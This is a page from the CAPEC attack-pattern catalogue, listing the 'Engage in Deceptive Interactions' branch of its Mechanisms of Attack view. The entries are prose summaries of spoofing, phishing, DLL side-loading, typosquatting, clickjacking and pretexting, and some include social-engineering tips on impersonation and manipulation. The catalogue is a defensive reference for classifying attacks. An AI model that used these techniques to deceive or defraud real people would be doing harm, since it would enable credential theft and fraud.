CAPEC - VIEW SLICE: CAPEC-1000: Mechanisms of Attack(Version 3.9)


Common Attack Pattern Enumeration and Classification A Community Resource for Identifying and Understanding Attacks

Home > CAPEC List > VIEW SLICE: CAPEC-1000: Mechanisms of Attack(Version 3.9)

CAPEC VIEW: Mechanisms of Attack

View ID: 1000

Structure: Graph

Downloads: Booklet | CSV | XML

Objective

This view organizes attack patterns hierarchically based on mechanisms that are frequently employed when exploiting a vulnerability. The categories that are members of this view represent the different techniques used to attack a system. They do not, however, represent the consequences or goals of the attacks. There exists the potential for some attack patterns to align with more than one category depending on one’s perspective. To counter this, emphasis was placed such that attack patterns as presented within each category use a technique not sometimes, but without exception.

Relationships

The following graph shows the tree-like relationships between attack patterns that exist at different levels of abstraction. At the highest level, categories exist to group patterns that share a common characteristic. Within categories, meta level attack patterns are used to present a decidedly abstract characterization of a methodology or technique. Below these are standard and detailed level patterns that are focused on a specific methodology or technique used.

Show Details:

Expand All | Collapse All | Filter View

1000 - Mechanisms of Attack

Category - A category in CAPEC is a collection of attack patterns based on some common characteristic. More specifically, it is an aggregation of attack patterns based on effect/intent (as opposed to actions or mechanisms, such an aggregation would be a meta attack pattern). An aggregation based on effect/intent is not an actionable attack and as such is not a pattern of attack behavior. Rather, it is a grouping of patterns based on some common criteria.Engage in Deceptive Interactions - (156)

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions)

Attack patterns within this category focus on malicious interactions with a target in an attempt to deceive the target and convince the target that it is interacting with some other principal and as such take actions based on the level of trust that exists between the target and the other principal. These types of attacks assume that some piece of content or functionality is associated with an identity and that the content / functionality is trusted by the target because of this association. Often identified by the term "spoofing", these types of attacks rely on the falsification of the content and/or identity in such a way that the target will incorrectly trust the legitimacy of the content. For example, an attacker may modify a financial transaction between two parties so that the participants remain unchanged but the amount of the transaction is increased. If the recipient cannot detect the change, they may incorrectly assume the modified message originated with the original sender. Attacks of these type may involve an adversary crafting the content from scratch or capturing and modifying legitimate content.

Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.Content Spoofing - (148)

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 148 (Content Spoofing)

An adversary modifies content to make it contain something other than what the original content producer intended while keeping the apparent source of the content unchanged. The term content spoofing is most often used to describe modification of web pages hosted by a target to display the adversary's content instead of the owner's content. However, any content can be spoofed, including the content of email messages, file transfers, or the content of other network communication protocols. Content can be modified at the source (e.g. modifying the source file for a web page) or in transit (e.g. intercepting and modifying a message between the sender and recipient). Usually, the adversary will attempt to hide the fact that the content has been modified, but in some cases, such as with web site defacement, this is not necessary. Content Spoofing can lead to malware exposure, financial fraud (if the content governs financial transactions), privacy violations, and other unwanted outcomes.

Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.Checksum Spoofing - (145)

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 148 (Content Spoofing) > 145 (Checksum Spoofing)

An adversary spoofs a checksum message for the purpose of making a payload appear to have a valid corresponding checksum. Checksums are used to verify message integrity. They consist of some value based on the value of the message they are protecting. Hash codes are a common checksum mechanism. Both the sender and recipient are able to compute the checksum based on the contents of the message. If the message contents change between the sender and recipient, the sender and recipient will compute different checksum values. Since the sender's checksum value is transmitted with the message, the recipient would know that a modification occurred. In checksum spoofing an adversary modifies the message body and then modifies the corresponding checksum so that the recipient's checksum calculation will match the checksum (created by the adversary) in the message. This would prevent the recipient from realizing that a change occurred.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 148 (Content Spoofing) > 218 (Spoofing of UDDI/ebXML Messages)

An attacker spoofs a UDDI, ebXML, or similar message in order to impersonate a service provider in an e-business transaction. UDDI, ebXML, and similar standards are used to identify businesses in e-business transactions. Among other things, they identify a particular participant, WSDL information for SOAP transactions, and supported communication protocols, including security protocols. By spoofing one of these messages an attacker could impersonate a legitimate business in a transaction or could manipulate the protocols used between a client and business. This could result in disclosure of sensitive information, loss of message integrity, or even financial fraud.

Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.Intent Spoof - (502)

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 148 (Content Spoofing) > 502 (Intent Spoof)

An adversary, through a previously installed malicious application, issues an intent directed toward a specific trusted application's component in an attempt to achieve a variety of different objectives including modification of data, information disclosure, and data injection. Components that have been unintentionally exported and made public are subject to this type of an attack. If the component trusts the intent's action without verififcation, then the target application performs the functionality at the adversary's request, helping the adversary achieve the desired negative technical impact.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 148 (Content Spoofing) > 627 (Counterfeit GPS Signals)

An adversary attempts to deceive a GPS receiver by broadcasting counterfeit GPS signals, structured to resemble a set of normal GPS signals. These spoofed signals may be structured in such a way as to cause the receiver to estimate its position to be somewhere other than where it actually is, or to be located where it is but at a different time, as determined by the adversary.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 148 (Content Spoofing) > 627 (Counterfeit GPS Signals) > 628 (Carry-Off GPS Attack)

A common form of a GPS spoofing attack, commonly termed a carry-off attack begins with an adversary broadcasting signals synchronized with the genuine signals observed by the target receiver. The power of the counterfeit signals is then gradually increased and drawn away from the genuine signals. Over time, the adversary can carry the target away from their intended destination and toward a location chosen by the adversary.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 151 (Identity Spoofing)

Identity Spoofing refers to the action of assuming (i.e., taking on) the identity of some other entity (human or non-human) and then using that identity to accomplish a goal. An adversary may craft messages that appear to come from a different principle or use stolen / spoofed authentication credentials.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 151 (Identity Spoofing) > 194 (Fake the Source of Data)

An adversary takes advantage of improper authentication to provide data or services under a falsified identity. The purpose of using the falsified identity may be to prevent traceability of the provided data or to assume the rights granted to another individual. One of the simplest forms of this attack would be the creation of an email message with a modified "From" field in order to appear that the message was sent from someone other than the actual sender. The root of the attack (in this case the email system) fails to properly authenticate the source and this results in the reader incorrectly performing the instructed action. Results of the attack vary depending on the details of the attack, but common results include privilege escalation, obfuscation of other attacks, and data corruption/manipulation.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 151 (Identity Spoofing) > 194 (Fake the Source of Data) > 275 (DNS Rebinding)

An adversary serves content whose IP address is resolved by a DNS server that the adversary controls. After initial contact by a web browser (or similar client), the adversary changes the IP address to which its name resolves, to an address within the target organization that is not publicly accessible. This allows the web browser to examine this internal address on behalf of the adversary.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 151 (Identity Spoofing) > 194 (Fake the Source of Data) > 543 (Counterfeit Websites)

Adversary creates duplicates of legitimate websites. When users visit a counterfeit site, the site can gather information or upload malware.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 151 (Identity Spoofing) > 194 (Fake the Source of Data) > 544 (Counterfeit Organizations)

An adversary creates a false front organizations with the appearance of a legitimate supplier in the critical life cycle path that then injects corrupted/malicious information system components into the organizational supply chain.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 151 (Identity Spoofing) > 194 (Fake the Source of Data) > 598 (DNS Spoofing)

An adversary sends a malicious ("NXDOMAIN" ("No such domain") code, or DNS A record) response to a target's route request before a legitimate resolver can. This technique requires an On-path or In-path device that can monitor and respond to the target's DNS requests. This attack differs from BGP Tampering in that it directly responds to requests made by the target instead of polluting the routing the target's infrastructure uses.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 151 (Identity Spoofing) > 194 (Fake the Source of Data) > 633 (Token Impersonation)

An adversary exploits a weakness in authentication to create an access token (or equivalent) that impersonates a different entity, and then associates a process/thread to that that impersonated token. This action causes a downstream user to make a decision or take action that is based on the assumed identity, and not the response that blocks the adversary.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 151 (Identity Spoofing) > 194 (Fake the Source of Data) > 697 (DHCP Spoofing)

An adversary masquerades as a legitimate Dynamic Host Configuration Protocol (DHCP) server by spoofing DHCP traffic, with the goal of redirecting network traffic or denying service to DHCP.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 151 (Identity Spoofing) > 195 (Principal Spoof)

A Principal Spoof is a form of Identity Spoofing where an adversary pretends to be some other person in an interaction. This is often accomplished by crafting a message (either written, verbal, or visual) that appears to come from a person other than the adversary. Phishing and Pharming attacks often attempt to do this so that their attempts to gather sensitive information appear to come from a legitimate source. A Principal Spoof does not use stolen or spoofed authentication credentials, instead relying on the appearance and content of the message to reflect identity.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 151 (Identity Spoofing) > 195 (Principal Spoof) > 599 (Terrestrial Jamming)

In this attack pattern, the adversary transmits disruptive signals in the direction of the target's consumer-level satellite dish (as opposed to the satellite itself). The transmission disruption occurs in a more targeted range. Portable terrestrial jammers have a range of 3-5 kilometers in urban areas and 20 kilometers in rural areas. This technique requires a terrestrial jammer that is more powerful than the frequencies sent from the satellite.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 151 (Identity Spoofing) > 473 (Signature Spoof)

An attacker generates a message or datablock that causes the recipient to believe that the message or datablock was generated and cryptographically signed by an authoritative or reputable source, misleading a victim or victim operating system into performing malicious actions.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 151 (Identity Spoofing) > 473 (Signature Spoof) > 459 (Creating a Rogue Certification Authority Certificate)

An adversary exploits a weakness resulting from using a hashing algorithm with weak collision resistance to generate certificate signing requests (CSR) that contain collision blocks in their "to be signed" parts. The adversary submits one CSR to be signed by a trusted certificate authority then uses the signed blob to make a second certificate appear signed by said certificate authority. Due to the hash collision, both certificates, though different, hash to the same value and so the signed blob works just as well in the second certificate. The net effect is that the adversary's second X.509 certificate, which the Certification Authority has never seen, is now signed and validated by that Certification Authority.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 151 (Identity Spoofing) > 473 (Signature Spoof) > 474 (Signature Spoofing by Key Theft)

An attacker obtains an authoritative or reputable signer's private signature key by theft and then uses this key to forge signatures from the original signer to mislead a victim into performing actions that benefit the attacker.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 151 (Identity Spoofing) > 473 (Signature Spoof) > 475 (Signature Spoofing by Improper Validation)

An adversary exploits a cryptographic weakness in the signature verification algorithm implementation to generate a valid signature without knowing the key.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 151 (Identity Spoofing) > 473 (Signature Spoof) > 476 (Signature Spoofing by Misrepresentation)

An attacker exploits a weakness in the parsing or display code of the recipient software to generate a data blob containing a supposedly valid signature, but the signer's identity is falsely represented, which can lead to the attacker manipulating the recipient software or its victim user to perform compromising actions.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 151 (Identity Spoofing) > 473 (Signature Spoof) > 477 (Signature Spoofing by Mixing Signed and Unsigned Content)

An attacker exploits the underlying complexity of a data structure that allows for both signed and unsigned content, to cause unsigned data to be processed as though it were signed data.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 151 (Identity Spoofing) > 473 (Signature Spoof) > 479 (Malicious Root Certificate)

An adversary exploits a weakness in authorization and installs a new root certificate on a compromised system. Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 151 (Identity Spoofing) > 473 (Signature Spoof) > 485 (Signature Spoofing by Key Recreation)

An attacker obtains an authoritative or reputable signer's private signature key by exploiting a cryptographic weakness in the signature algorithm or pseudorandom number generation and then uses this key to forge signatures from the original signer to mislead a victim into performing actions that benefit the attacker.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 151 (Identity Spoofing) > 89 (Pharming)

A pharming attack occurs when the victim is fooled into entering sensitive data into supposedly trusted locations, such as an online bank site or a trading platform. An attacker can impersonate these supposedly trusted sites and have the victim be directed to their site rather than the originally intended one. Pharming does not require script injection or clicking on malicious links for the attack to succeed.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 151 (Identity Spoofing) > 98 (Phishing)

Phishing is a social engineering technique where an attacker masquerades as a legitimate entity with which the victim might do business in order to prompt the user to reveal some confidential information (very frequently authentication credentials) that can later be used by an attacker. Phishing is essentially a form of information gathering or "fishing" for information.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 151 (Identity Spoofing) > 98 (Phishing) > 163 (Spear Phishing)

An adversary targets a specific user or group with a Phishing (CAPEC-98) attack tailored to a category of users in order to have maximum relevance and deceptive capability. Spear Phishing is an enhanced version of the Phishing attack targeted to a specific user or group. The quality of the targeted email is usually enhanced by appearing to come from a known or trusted entity. If the email account of some trusted entity has been compromised the message may be digitally signed. The message will contain information specific to the targeted users that will enhance the probability that they will follow the URL to the compromised site. For example, the message may indicate knowledge of the targets employment, residence, interests, or other information that suggests familiarity. As soon as the user follows the instructions in the message, the attack proceeds as a standard Phishing attack.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 151 (Identity Spoofing) > 98 (Phishing) > 164 (Mobile Phishing)

An adversary targets mobile phone users with a phishing attack for the purpose of soliciting account passwords or sensitive information from the user. Mobile Phishing is a variation of the Phishing social engineering technique where the attack is initiated via a text or SMS message, rather than email. The user is enticed to provide information or visit a compromised web site via this message. Apart from the manner in which the attack is initiated, the attack proceeds as a standard Phishing attack.SmishingMobPhishing

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 151 (Identity Spoofing) > 98 (Phishing) > 656 (Voice Phishing)

An adversary targets users with a phishing attack for the purpose of soliciting account passwords or sensitive information from the user. Voice Phishing is a variation of the Phishing social engineering technique where the attack is initiated via a voice call, rather than email. The user is enticed to provide sensitive information by the adversary, who masquerades as a legitimate employee of the alleged organization. Voice Phishing attacks deviate from standard Phishing attacks, in that a user doesn't typically interact with a compromised website to provide sensitive information and instead provides this information verbally. Voice Phishing attacks can also be initiated by either the adversary in the form of a "cold call" or by the victim if calling an illegitimate telephone number.VishingVoIP Phishing

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 154 (Resource Location Spoofing)

An adversary deceives an application or user and convinces them to request a resource from an unintended location. By spoofing the location, the adversary can cause an alternate resource to be used, often one that the adversary controls and can be used to help them achieve their malicious goals.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 154 (Resource Location Spoofing) > 159 (Redirect Access to Libraries)

An adversary exploits a weakness in the way an application searches for external libraries to manipulate the execution flow to point to an adversary supplied library or code base. This pattern of attack allows the adversary to compromise the application or server via the execution of unauthorized code. An application typically makes calls to functions that are a part of libraries external to the application. These libraries may be part of the operating system or they may be third party libraries. If an adversary can redirect an application's attempts to access these libraries to other libraries that the adversary supplies, the adversary will be able to force the targeted application to execute arbitrary code. This is especially dangerous if the targeted application has enhanced privileges. Access can be redirected through a number of techniques, including the use of symbolic links, search path modification, and relative path manipulation.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 154 (Resource Location Spoofing) > 159 (Redirect Access to Libraries) > 132 (Symlink Attack)

An adversary positions a symbolic link in such a manner that the targeted user or application accesses the link's endpoint, assuming that it is accessing a file with the link's name.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 154 (Resource Location Spoofing) > 159 (Redirect Access to Libraries) > 38 (Leveraging/Manipulating Configuration File Search Paths)

This pattern of attack sees an adversary load a malicious resource into a program's standard path so that when a known command is executed then the system instead executes the malicious component. The adversary can either modify the search path a program uses, like a PATH variable or classpath, or they can manipulate resources on the path to point to their malicious components. J2EE applications and other component based applications that are built from multiple binaries can have very long list of dependencies to execute. If one of these libraries and/or references is controllable by the attacker then application controls can be circumvented by the attacker.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 154 (Resource Location Spoofing) > 159 (Redirect Access to Libraries) > 471 (Search Order Hijacking)

An adversary exploits a weakness in an application's specification of external libraries to exploit the functionality of the loader where the process loading the library searches first in the same directory in which the process binary resides and then in other directories. Exploitation of this preferential search order can allow an attacker to make the loading process load the adversary's rogue library rather than the legitimate library. This attack can be leveraged with many different libraries and with many different loading processes. No forensic trails are left in the system's registry or file system that an incorrect library had been loaded.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 154 (Resource Location Spoofing) > 159 (Redirect Access to Libraries) > 641 (DLL Side-Loading)

An adversary places a malicious version of a Dynamic-Link Library (DLL) in the Windows Side-by-Side (WinSxS) directory to trick the operating system into loading this malicious DLL instead of a legitimate DLL. Programs specify the location of the DLLs to load via the use of WinSxS manifests or DLL redirection and if they aren't used then Windows searches in a predefined set of directories to locate the file. If the applications improperly specify a required DLL or WinSxS manifests aren't explicit about the characteristics of the DLL to be loaded, they can be vulnerable to side-loading.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 154 (Resource Location Spoofing) > 616 (Establish Rogue Location)

An adversary provides a malicious version of a resource at a location that is similar to the expected location of a legitimate resource. After establishing the rogue location, the adversary waits for a victim to visit the location and access the malicious resource.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 154 (Resource Location Spoofing) > 616 (Establish Rogue Location) > 505 (Scheme Squatting)

An adversary, through a previously installed malicious application, registers for a URL scheme intended for a target application that has not been installed. Thereafter, messages intended for the target application are handled by the malicious application. Upon receiving a message, the malicious application displays a screen that mimics the target application, thereby convincing the user to enter sensitive information. This type of attack is most often used to obtain sensitive information (e.g., credentials) from the user as they think that they are interacting with the intended target application.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 154 (Resource Location Spoofing) > 616 (Establish Rogue Location) > 611 (BitSquatting)

An adversary registers a domain name one bit different than a trusted domain. A BitSquatting attack leverages random errors in memory to direct Internet traffic to adversary-controlled destinations. BitSquatting requires no exploitation or complicated reverse engineering, and is operating system and architecture agnostic. Experimental observations show that BitSquatting popular websites could redirect non-trivial amounts of Internet traffic to a malicious entity.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 154 (Resource Location Spoofing) > 616 (Establish Rogue Location) > 615 (Evil Twin Wi-Fi Attack)

Adversaries install Wi-Fi equipment that acts as a legitimate Wi-Fi network access point. When a device connects to this access point, Wi-Fi data traffic is intercepted, captured, and analyzed. This also allows the adversary to use "adversary-in-the-middle" (CAPEC-94) for all communications.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 154 (Resource Location Spoofing) > 616 (Establish Rogue Location) > 617 (Cellular Rogue Base Station)

In this attack scenario, the attacker imitates a cellular base station with their own "rogue" base station equipment. Since cellular devices connect to whatever station has the strongest signal, the attacker can easily convince a targeted cellular device (e.g. the retransmission device) to talk to the rogue base station.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 154 (Resource Location Spoofing) > 616 (Establish Rogue Location) > 630 (TypoSquatting)

An adversary registers a domain name with at least one character different than a trusted domain. A TypoSquatting attack takes advantage of instances where a user mistypes a URL (e.g. www.goggle.com) or not does visually verify a URL before clicking on it (e.g. phishing attack). As a result, the user is directed to an adversary-controlled destination. TypoSquatting does not require an attack against the trusted domain or complicated reverse engineering.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 154 (Resource Location Spoofing) > 616 (Establish Rogue Location) > 631 (SoundSquatting)

An adversary registers a domain name that sounds the same as a trusted domain, but has a different spelling. A SoundSquatting attack takes advantage of a user's confusion of the two words to direct Internet traffic to adversary-controlled destinations. SoundSquatting does not require an attack against the trusted domain or complicated reverse engineering.Homophone Attack

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 154 (Resource Location Spoofing) > 616 (Establish Rogue Location) > 632 (Homograph Attack via Homoglyphs)

An adversary registers a domain name containing a homoglyph, leading the registered domain to appear the same as a trusted domain. A homograph attack leverages the fact that different characters among various character sets look the same to the user. Homograph attacks must generally be combined with other attacks, such as phishing attacks, in order to direct Internet traffic to the adversary-controlled destinations.Homoglyph Attack

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 154 (Resource Location Spoofing) > 616 (Establish Rogue Location) > 667 (Bluetooth Impersonation AttackS (BIAS))

An adversary disguises the MAC address of their Bluetooth enabled device to one for which there exists an active and trusted connection and authenticates successfully. The adversary can then perform malicious actions on the target Bluetooth device depending on the target’s capabilities.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 154 (Resource Location Spoofing) > 616 (Establish Rogue Location) > 695 (Repo Jacking)

An adversary takes advantage of the redirect property of directly linked Version Control System (VCS) repositories to trick users into incorporating malicious code into their applications.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 173 (Action Spoofing)

An adversary is able to disguise one action for another and therefore trick a user into initiating one type of action when they intend to initiate a different action. For example, a user might be led to believe that clicking a button will submit a query, but in fact it downloads software. Adversaries may perform this attack through social means, such as by simply convincing a victim to perform the action or relying on a user's natural inclination to do so, or through technical means, such as a clickjacking attack where a user sees one interface but is actually interacting with a second, invisible, interface.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 173 (Action Spoofing) > 103 (Clickjacking)

An adversary tricks a victim into unknowingly initiating some action in one system while interacting with the UI from a seemingly completely different, usually an adversary controlled or intended, system.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 173 (Action Spoofing) > 103 (Clickjacking) > 181 (Flash File Overlay)

An attacker creates a transparent overlay using flash in order to intercept user actions for the purpose of performing a clickjacking attack. In this technique, the Flash file provides a transparent overlay over HTML content. Because the Flash application is on top of the content, user actions, such as clicks, are caught by the Flash application rather than the underlying HTML. The action is then interpreted by the overlay to perform the actions the attacker wishes.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 173 (Action Spoofing) > 103 (Clickjacking) > 222 (iFrame Overlay)

In an iFrame overlay attack the victim is tricked into unknowingly initiating some action in one system while interacting with the UI from seemingly completely different system.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 173 (Action Spoofing) > 103 (Clickjacking) > 587 (Cross Frame Scripting (XFS))

This attack pattern combines malicious Javascript and a legitimate webpage loaded into a concealed iframe. The malicious Javascript is then able to interact with a legitimate webpage in a manner that is unknown to the user. This attack usually leverages some element of social engineering in that an attacker must convinces a user to visit a web page that the attacker controls.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 173 (Action Spoofing) > 501 (Android Activity Hijack)

An adversary intercepts an implicit intent sent to launch a Android-based trusted activity and instead launches a counterfeit activity in its place. The malicious activity is then used to mimic the trusted activity's user interface and prompt the target to enter sensitive data as if they were interacting with the trusted activity.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 173 (Action Spoofing) > 504 (Task Impersonation)

An adversary, through a previously installed malicious application, impersonates an expected or routine task in an attempt to steal sensitive information or leverage a user's privileges.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 173 (Action Spoofing) > 504 (Task Impersonation) > 654 (Credential Prompt Impersonation)

An adversary, through a previously installed malicious application, impersonates a credential prompt in an attempt to steal a user's credentials.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 173 (Action Spoofing) > 506 (Tapjacking)

An adversary, through a previously installed malicious application, displays an interface that misleads the user and convinces them to tap on an attacker desired location on the screen. This is often accomplished by overlaying one screen on top of another while giving the appearance of a single interface. There are two main techniques used to accomplish this. The first is to leverage transparent properties that allow taps on the screen to pass through the visible application to an application running in the background. The second is to strategically place a small object (e.g., a button or text field) on top of the visible screen and make it appear to be a part of the underlying application. In both cases, the user is convinced to tap on the screen but does not realize the application that they are interacting with.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 416 (Manipulate Human Behavior)

An adversary exploits inherent human psychological predisposition to influence a targeted individual or group to solicit information or manipulate the target into performing an action that serves the adversary's interests. Many interpersonal social engineering techniques do not involve outright deception, although they can; many are subtle ways of manipulating a target to remove barriers, make the target feel comfortable, and produce an exchange in which the target is either more likely to share information directly, or let key information slip out unintentionally. A skilled adversary uses these techniques when appropriate to produce the desired outcome. Manipulation techniques vary from the overt, such as pretending to be a supervisor to a help desk, to the subtle, such as making the target feel comfortable with the adversary's speech and thought patterns.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 416 (Manipulate Human Behavior) > 407 (Pretexting)

An adversary engages in pretexting behavior to solicit information from target persons, or manipulate the target into performing some action that serves the adversary's interests. During a pretexting attack, the adversary creates an invented scenario, assuming an identity or role to persuade a targeted victim to release information or perform some action. It is more than just creating a lie; in some cases it can be creating a whole new identity and then using that identity to manipulate the receipt of information.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 416 (Manipulate Human Behavior) > 407 (Pretexting) > 383 (Harvesting Information via API Event Monitoring)

An adversary hosts an event within an application framework and then monitors the data exchanged during the course of the event for the purpose of harvesting any important data leaked during the transactions. One example could be harvesting lists of usernames or userIDs for the purpose of sending spam messages to those users. One example of this type of attack involves the adversary creating an event within the sub-application. Assume the adversary hosts a "virtual sale" of rare items. As other users enter the event, the attacker records via AiTM (CAPEC-94) proxy the user_ids and usernames of everyone who attends. The adversary would then be able to spam those users within the application using an automated script.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 416 (Manipulate Human Behavior) > 407 (Pretexting) > 412 (Pretexting via Customer Service)

An adversary engages in pretexting behavior, assuming the role of someone who works for Customer Service, to solicit information from target persons, or manipulate the target into performing an action that serves the adversary's interests. One example of a scenario such as this would be to call an individual, articulate your false affiliation with a credit card company, and then attempt to get the individual to verify their credit card number.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 416 (Manipulate Human Behavior) > 407 (Pretexting) > 413 (Pretexting via Tech Support)

An adversary engages in pretexting behavior, assuming the role of a tech support worker, to solicit information from target persons, or manipulate the target into performing an action that serves the adversary's interests. An adversary who uses social engineering to impersonate a tech support worker can have devastating effects on a network. This is an effective attack vector, because it can give an adversary physical access to network computers. It only takes a matter of seconds for someone to compromise a computer with physical access. One of the best technological tools at the disposal of a social engineer, posing as a technical support person, is a USB thumb drive. These are small, easy to conceal, and can be loaded with different payloads depending on what task needs to be done. However, this form of attack does not require physical access as it can also be effectively carried out via phone or email.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 416 (Manipulate Human Behavior) > 407 (Pretexting) > 414 (Pretexting via Delivery Person)

An adversary engages in pretexting behavior, assuming the role of a delivery person, to solicit information from target persons, or manipulate the target into performing an action that serves the adversary's interests. Impersonating a delivery person is an effective attack and an easy attack since not much acting is involved. Usually the hardest part is looking the part and having all of the proper credentials, papers and "deliveries" in order to be able to pull it off.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 416 (Manipulate Human Behavior) > 407 (Pretexting) > 415 (Pretexting via Phone)

An adversary engages in pretexting behavior, assuming some sort of trusted role, and contacting the targeted individual or organization via phone to solicit information from target persons, or manipulate the target into performing an action that serves the adversary's interests. This is the most common social engineering attack. Some of the most commonly effective approaches are to impersonate a fellow employee, impersonate a computer technician or to target help desk personnel.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 416 (Manipulate Human Behavior) > 417 (Influence Perception)

The adversary uses social engineering to exploit the target's perception of the relationship between the adversary and themselves. This goal is to persuade the target to unknowingly perform an action or divulge information that is advantageous to the adversary.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 416 (Manipulate Human Behavior) > 417 (Influence Perception) > 418 (Influence Perception of Reciprocation)

An adversary uses a social engineering techniques to produce a sense of obligation in the target to perform a certain action or concede some sensitive or key piece of information. Obligation has to do with actions one feels they need to take due to some sort of social, legal, or moral requirement, duty, contract, or promise. There are various techniques for fostering a sense of obligation to reciprocate or concede during ordinary modes of communication. One method is to compliment the target, and follow up the compliment with a question. If performed correctly the target may volunteer a key piece of information, sometimes involuntarily.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 416 (Manipulate Human Behavior) > 417 (Influence Perception) > 420 (Influence Perception of Scarcity)

The adversary leverages a perception of scarcity to persuade the target to perform an action or divulge information that is advantageous to the adversary. By conveying a perception of scarcity, or a situation of limited supply, the adversary aims to create a sense of urgency in the context of a target's decision-making process.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 416 (Manipulate Human Behavior) > 417 (Influence Perception) > 421 (Influence Perception of Authority)

An adversary uses a social engineering technique to convey a sense of authority that motivates the target to reveal specific information or take specific action. There are various techniques for producing a sense of authority during ordinary modes of communication. One common method is impersonation. By impersonating someone with a position of power within an organization, an adversary may motivate the target individual to reveal some piece of sensitive information or perform an action that benefits the adversary.

